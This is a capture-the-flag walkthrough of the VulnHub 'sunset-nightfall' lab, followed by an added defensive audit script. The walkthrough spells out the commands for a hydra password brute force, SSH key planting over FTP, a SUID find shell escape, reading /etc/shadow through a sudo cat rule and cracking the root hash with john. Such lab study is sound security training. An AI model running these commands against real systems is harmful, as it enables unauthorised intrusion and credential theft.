Morning~~~
Address: https://www.vulnhub.com/entry/sunset-nightfall,355/
The focus is on the tools and the line of thinking.
nmap 192.168.43.0/24
Target IP: 192.168.43.14
nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
Visiting http://192.168.43.14/ shows the Apache2 Debian page
enum4linux 192.168.43.14
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
Top 100,000 most common passwords (international)
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp
Credentials: matt/cheese
Log in at ftp://192.168.43.14/; the directory is /home/matt
On the attacking machine, run ssh-keygen
This generates /root/.ssh/id_rsa.pub and /root/.ssh/id_rsa
cat id_rsa.pub > authorized_keys
ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa
ssh matt@192.168.43.14, login succeeds
Find files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
Found the nightfall user
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d
Get nightfall privileges
/scripts/find . -exec "/bin/sh" -p \;
sudo -l, fails
python3 -m http.server 8080
cd /home/nightfall
ls -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys
ssh nightfall@192.168.43.14, nightfall privileges obtained
sudo -l
(root) NOPASSWD: /usr/bin/cat
sudo /usr/bin/cat /etc/shadow
Copy the second field of the root entry and save it as mima.txt
john /root/Desktop/mima.txt, cracked as miguel2
su root, then just enter the password
cat root_super_secret_flag.txt, in the home directory
flag{9a5b21fc6719fe33004d66b703d70a39}
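
Both privilege-escalation steps above depend on misconfigurations: a SUID copy of find under /scripts and a NOPASSWD sudo rule for /usr/bin/cat. The script below is an added audit example, not part of the original write-up, that flags both from the output of the same find and sudo -l commands. The directory baseline, the tool list, the function names and the sample input are assumptions.

```shell
#!/bin/sh
# Added audit example, not part of the original write-up.
# Assumed baseline: directories where packages install SUID files, and
# general-purpose tools that should be neither SUID nor NOPASSWD in sudo.
SUID_DIRS='/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec'
GENERIC='find cat less more vi vim nano awk sed cp tar env sh bash dash python3 perl'

# is_generic NAME: succeeds if NAME is on the GENERIC list.
is_generic() {
    for g in $GENERIC; do [ "$1" = "$g" ] && return 0; done
    return 1
}

# triage_suid: SUID file paths on stdin -> "reason<TAB>path" for risky ones.
# Usage: find / -perm -u=s -type f 2>/dev/null | triage_suid
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        reason=unusual-path
        for d in $SUID_DIRS; do
            case $path in "$d"/*) reason= ;; esac
        done
        if is_generic "${path##*/}"; then reason=generic-tool; fi
        [ -z "$reason" ] || printf '%s\t%s\n' "$reason" "$path"
    done
}

# triage_sudo: `sudo -l` output on stdin -> NOPASSWD rules for generic tools.
# Usage: sudo -l | triage_sudo
triage_sudo() {
    grep 'NOPASSWD:' | sed 's/.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' |
    while read -r cmd _args; do
        if is_generic "${cmd##*/}"; then printf 'nopasswd-generic\t%s\n' "$cmd"; fi
    done
}

# Constructed sample input modelled on the write-up (not a real scan).
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/scripts/find
/opt/backup/helper'
SAMPLE_SUDO='User nightfall may run the following commands on nightfall:
    (root) NOPASSWD: /usr/bin/cat'

printf '%s\n' "$SAMPLE_SUID" | triage_suid
printf '%s\n' "$SAMPLE_SUDO" | triage_sudo
```

Anything reported as generic-tool or nopasswd-generic should have the SUID bit or the sudo rule removed. Entries reported as unusual-path need an owner and a justification before they stay.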